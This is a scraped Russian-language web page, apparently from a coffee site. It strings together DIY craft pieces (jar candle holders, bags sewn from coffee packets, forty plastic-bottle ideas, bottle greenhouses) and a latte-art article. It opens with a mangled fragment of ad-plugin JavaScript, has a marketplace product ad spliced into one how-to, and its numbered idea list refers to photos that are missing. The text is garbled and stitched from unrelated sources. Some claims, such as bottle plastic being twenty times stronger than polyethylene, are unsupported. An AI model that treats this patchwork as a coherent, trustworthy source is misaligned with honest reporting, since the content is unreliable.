‘”]’);if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,n=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,r=’

‘,i=e.once;l(t).each(function(){var e=l(this);e.wrap(‘

‘);var t=e.closest(“.flat__4_video”);-1!==r.indexOf(“go” “oglesyndication”)?t.append(r):flatPM_setHTML(t[0],r),e.find(“.flat__4_video_flex”).one(“click”,function(){l(this).addClass(“show”)})}),l(“body”).on(“click”,”.flat__4_video_item_hover”,function(){var e=l(this),t=e.closest(“.flat__4_video_flex”);t.addClass(“show”);var a=t.find(“.flat__4_timer span”),n=parseInt(o),r=setInterval(function(){a.text(–n),n<=0&&(clearInterval(r),”true”==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(“click”,”.flat__4_video_flex .flat__4_cross”,function(){l(this).closest(“.flat__4_video_flex”).remove(),”true”==i&&l(“.flat__4_video_flex”).remove()})};

Подсвечник

В эпоху электрификации подсвечники давно не служат по своему функциональному назначению, а являются предметом эстетического украшения пространства. Огонь свечи навевает уют, создает расслабленное настроение, придает романтическим вечерам загадочности и таинственности. Даже при незажженном огне, подсвечники украшают собой привычный интерьер в доме.

Оригинальные подсвечники можно смастерить из жестяных и стеклянных банок. Их не стыдно подарить на День рождения или Новый год.

План работы изготовления подсвечника из стеклянной банки:

  1. Промыть банку, удалить загрязнения, тщательно высушить;
  2. Кусочки воска растопить в металлической посуде, регулярно помешивая деревянной ложкой или палочкой;
  3. Добавить в восковую массу немного ароматических масел и красителей;
  4. Залить расплавленный воск в банку;
  5. Вставить фитиль.

С фитилем нужно соблюдать несколько правил. Воск имеет свойство быстро застывать, но фитиль может утонуть в нем еще быстрее. В качества фитиля используют хлопковый шнур. К одному концу привязывают тяжелую пуговицу или другой грузик, опускают его на дно.

Интересно смотрится полосатая свеча. Для этого восковую массу делят на три равных части и окрашивают в разные цвета пищевыми красителями.

Если баночки со свечой подвесить к стене при помощи металлических или джутовых держателей, то получается фонарики.

Многие мастера используют банки в креативной работе из-за заботы об экологии. Жестяные и пластиковые тары разлагаются сотни лет, нанося вред окружающей среде. Гораздо разумнее дать банкам вторую жизнь, превратив их в оригинальные предметы декора.

Смешные сумки!. обсуждение на liveinternet – российский сервис онлайн-дневников

Сумки из из пакетов из-под кофе

Мастер-класс по созданию эффектных сумок из подручных материалов от автора Раймунда из Литвы. Используя пакеты из-под кофе, можно за пару часов сшить оригинальную пляжную сумку или сумку для покупок. К тому же, весьма прочную.

original (6) (640x426, 156Kb)

Для одной сумки потребуется:

– 9 пакетов из под кофе,
– швейная машина с нитками,
– ножницы,
– хорошее настроение.                    

Предлагаем ознакомиться:  Кофе капсульный Nescafe Dolce Gusto Caramel Latte Macchiato, 3 упаковки по 16 капсул — купить в интернет-магазине OZON с быстрой доставкой

Приступаем к работе:

1. Пьем кофе, пакеты не выбрасываем, или собираем их у друзей и знакомых.

original (7) (640x480, 294Kb)
2. Открываем пакеты, чистим их.
3. На пару дней оставляем под чем-то тяжелым.
4. Ножницами сравниваем края пакетов.
5. Сшиваем пакеты на лицевой стороне, потом на изнаночной.

original (8) (640x480, 145Kb)
6. Сшиваем ручки для сумки, пришиваем их к заготовкам сумки.

original (9) (640x480, 266Kb)
7. Сшиваем обе стороны сумки, сначала на лицевой стороне, потом на изнаночной. Выворачиваем.

original (10) (640x480, 228Kb)
8. Сумка готова!

original (11) (480x640, 195Kb)

original (12) (640x480, 307Kb)

Picture 362 (525x700, 147Kb)Picture 424 (700x525, 162Kb)Picture 437 (525x700, 112Kb)tergd (640x480, 61Kb)Picture 071 (700x525, 156Kb)477366 (450x488, 55Kb)

Так что пейте кофе! Много и с удовольствием! 1177 (15x15, 0Kb)

§

Сорок оригинальных идей использования пластиковых бутылок для дизайна и украшения дома и приусадебного участка

Для создания из ненужных пустых бутылок оригинальной вещицы, которая послужит украшением или удобным приспособлением в вашем доме, нужно совсем немного – пустые пластиковые бутылки, ножницы плюс ваша фантазия.

А некоторые идеи уже воплощены в жизнь. Возможно, что-то из этого понравится и вам.

1.

Самое простое, что можно сделать, – это горшочки для рассады или подвесную кормушку для птиц. Если вы насобирали большое количество бутылок, можно сделать такие же оригинальные поделки, как на этом фото.

2.

Изящные шторы из днищ от бутылок из прозрачного пластика, скреплённых между собой прочной нитью.

3.

Твёрдая основа для удобного пуфика из пластиковых бутылок – легко и прочно.

4.

Вот такие яркие цветы, созданные из обычных раскрашенных бутылок, расцвели на ограде.

5.

И снова донышки от бутылок – теперь уже для оформления светильников.

6.

Сделанный по тому же принципу занавес.

7.

Украшения из пластика для висячих светильников – очень просто и красиво.

8.

Яркие цветочные подвески могут украсить любой праздник.

9.

А это уже настоящие люстры.

10.

Прекрасные органайзеры для хранения всяких мелочей.

11.

Большие старые пластиковые бутылки с успехом заменят на грядках переносные контейнеры для растений.

12.

Пластиковые бутылки можно использовать даже для строительства ограды…

13.

…или лёгкого садового заборчика.

14.

Можно сделать и вот такой оригинальный навес.

15.

Вид на навес сверху.

16.

А вот такой он во всей своей красе.

17.

Из старой бутылки получится прекрасный разбрызгиватель для сада…

18.

…и всего-то – соединить горлышко бутылки со шлангом и прорезать ближе к днищу несколько небольших отверстий.

19.

К Рождеству можно сделать вот такой яркий веночек на дверь.

20.

Большие непрозрачные или окрашенные бутылки могут составить на вашем подоконнике целую кошачью компанию в виде вазонов под цветы.

21.

Пластиковые бутылки – отличный материал для создания парников и теплиц.

22.

Оригинальные занавеси из бутылочных крышек.

23.

Новогодние снежинки на ёлку – снова в ходу бутылочные донышки.

24.

А вот и ёлочка.

25.

Пластиковая шкатулка на молнии – неплохая идея не только для домашних мелочей, но и для путешествий.

26.

Вот такой «ракетный двигатель» можно сделать для маленького лётчика.

27.

Из двухлитровых бутылок можно сделать каскадную вазу для конфет…

28.

…или висячий настенный сад.

29.

Замечательная идея в походных условиях – «солнечная» лампа из бутылки, наполненной водой и отбеливателем.

30.

И так знакомая всем свинья – копилка – тоже из пластиковой бутылки.

31.

Можно развлечь детвору запуском вот таких пузырчатых змеев, поместив в бутылку мыльный раствор и проделав несколько мелких дырочек.

32.

Яркие бабочки из прозрачных пластиковых бутылок украсят ваш интерьер – раскрасьте их красками и сделайте тельце из бусинок.

33.

Многоярусная подставка для ювелирных украшений из бутылочных донышек.

34.

Забавный пингвинчик получится из двух соединённых между собой бутылочных половинок.

35.

И снова висячий сад – только здесь уже бутылки расположены вертикально. Если через них пропустить тонкие шланги с дырочками, подсоединённые к ёмкости с водой, как на этом фото, – ваш садик будет снабжаться водой постоянно.

36.

Оригинальная упаковка в виде яблока для мелкого подарка, конфет или разной мелочи.

37.

Прекрасный органайзер для клубков, который понравится рукодельницам.

38.

Симпатичные гномы – для рассады и зелени.

39.

Держатель туалетной бумаги из большой бутыли для дачи.

40.

Кормушка из бутылки для маленьких птичек в холодную погоду.

Вам понравились эти вещи? Возможно, они вдохновят вас на творчество, и вы создадите что-то совсем новое и оригинальное!

Теплицы из пластиковых бутылок

Готовая теплица средних размеров стоит более 15 тысяч рублей. Я точно знаю, поскольку интересовалась этим вопросом. Прибавьте к тому стоимость сборки. Не все же могут разобраться, что там к чему. Но есть альтернатива, которая не уступает по эксплуатационным качествам и обойдётся вам… всего-то в 500-700 пустых пластиковых бутылок! =))

Пластик, из которого делают бутылки, в 20 раз прочнее плотного полиэтилена. Он отлично держит температуру, не плавится на солнце и может служить десятилетиями. Теплица из пластиковой бутылки имеет ряд преимуществ:

  • она дешёвая;
  • долговечная;
  • легко ремонтируется;
  • лёгкая по весу, её можно переставить при необходимости;
  • выглядит довольно симпатично.

Я погуляла по разным сайтам и поняла, что существует 2 основных способа использования пластиковых бутылок при строительстве:

  1. У каждой бутылки отрезается дно. Берётся тонкая рейка и на неё нанизываются все бутылки. Получатся готовые строительные планки.
  2. У бутылок отрезается дно и горло. Затем то, что получилось, — средняя часть — разрезается вдоль. Получается прямоугольный кусок пластика. Его проглаживаем утюгом (обязательно через твёрдую бумагу), чтобы выровнять. Из таких вот листов сшиваем листы побольше. Желательно, внахлёст. Использовать можно шило; для скрепления деталей — кордовую нить или проволоку. Не рекомендуется сшивать ниткой или леской — швы быстро сгниют и разойдутся.

Когда листы (планки) готовы, можно и каркас сделать. Делается он из обычных деревянных брусков с помощью молотка и гвоздей. Форма — любая. Можно — домиком, можно — треугольником. А затем уже на каркас крепим то, что сделали из бутылок. В первом случае планки нужно ставить максимально близко друг к другу, чтобы ветер не гулял.

Важный момент — крыша. В общем-то, хороший каркас способен выдержать довольно тяжёлый вес, но знающие люди советуют крышу покрывать не бутылками, а поликарбонатными листами. Или на зиму чем-то укреплять — вдруг снега много навалит.

Техники нанесения рисунков

Кофе-арт выполняется на свежезаваренном эспрессо с пышной пенкой, которая по большей части состоит из кофейных масел. Техника основана на том, что пузырьки взбитого молока способны удерживаться на поверхности напитка за счет своего легкого веса. Это длится недолго – молочная пена довольно быстро распадается на сухие и жидкие частицы, и рисунок постепенно теряет форму. Искусство требует от бариста немалого мастерства не только в рисовании, но и в правильной подготовке всех ингредиентов.

Существует ряд стилей, в которых выполняется изображение:

  • Питчинг. Классический и наиболее распространенный метод нанесения изображений с помощью питчера – стального кувшина для взбивания молока. Бариста создает рисунок на поверхности напитков, манипулируя емкостью. Точность в немалой степени зависит от опыта мастера.
  • Этчинг. Более простой, но менее популярный способ с использованием так называемых latte-art pan – острых предметов: деревянных шпажек, зубочисток, палочек для еды и кисточек. Техника позволяет добиться сложных изображений и широко используется в соревнованиях по латте-арт.
  • Трафареты. Метод подходит для украшения кофе дома, часто ее используют начинающие бариста. Рисунок наносится с помощью трафарета из тонкого пластика или плотной бумаги.
  • Капучино-арт. Рисунку придают объем и новые краски с помощью тертого шоколада, корицы, топпингов и пищевых красителей.
  • Мульти-арт – сочетание разных техник, требует от бариста совершенного владения всеми приемами нанесения рисунка.

фото сложного рисунка на кофе
Сложные рисунки выполняет специальный кофейный автомат
Сложность узоров зависит от ряда факторов:

  • направления движения питчера;
  • резонанса колебаний жидкости в емкости;
  • выбора правильной точки для начала рисования;
  • скорости нанесения вспененного молока.

Самые популярные фигуры – сердце, яблоко и так называемый «цветок папоротника», которые выполняются несколькими движениями. Более сложные формы требуют послойного нанесения молочной пены.


Продвинутые мастера изображают на поверхности кофе силуэты птиц, зверей и даже насекомых. В барах и ресторанах бариста предпочитают питчинг, так этот метод не требует кропотливой работы и позволяет быстро подать горячий кофе клиенту.

Чашечку живописи, плиз!

Идея совмещения изобразительного и кулинарного искусств не нова, но как подкупает кофейно-молочная основа, способная удерживать некоторое время картинку, узоры или словосочетания, не смешивая и не растворяя их. Замысел был оценен и одобрен множеством любителей всего неординарного. Распространился кофе с рисунком на праздновании Дня Рождения, на семенных торжествах, на маленьких юбилеях влюбленных. Оказалось, что с помощью кофейной чашки можно признаться в любви, сделать предложение руки и сердца, попросить прощение, вызвать самые радостные эмоции.

Сила искусства, помноженная на бодрящий аромат, создала целое направление, получившее название латте-арт. Нет точных сведений о гениальном изобретателе кофейно-молочных картинок. Зарождение этого мимолетного, но поразительного искусства связывают с орденом монахов-капуцинов, обитающих в Италии. Подумать только, ведь капучино действительно созвучно капуцинам, хотя некоторые усматривают связь только с темно-коричневыми рясами монахов. Версия с капуцином-бариста, для которого рисование на кофе важнее молитв и поста, весьма сомнительна, но очень симпатична.А вот имя распространителя славы латте-арт известно всем поклонникам кофейной церемонии, это американец Дэвид Шомер, владелец сети популярнейших кофеен «Espresso Vivace».  Дэвид на страницах своей книги и в многочисленных статьях описал секрет приготовления идеального латте-арт, начиная от инструментов и заканчивая температурными особенностями и плотностью молочной пены. И кстати, Шомер не скрывает, что обучался этим умениям у современных итальянцев, но без упоминаний  о капуцинских монахах. Сегодня кофейные картинки стали настолько популярным, что устраиваются специальные соревнования, где границы кулинарии, живописи и скульптуры окончательно смешиваются под восторг зрителей и жюри.

Оцените статью
Про кофе
Добавить комментарий

Adblock
detector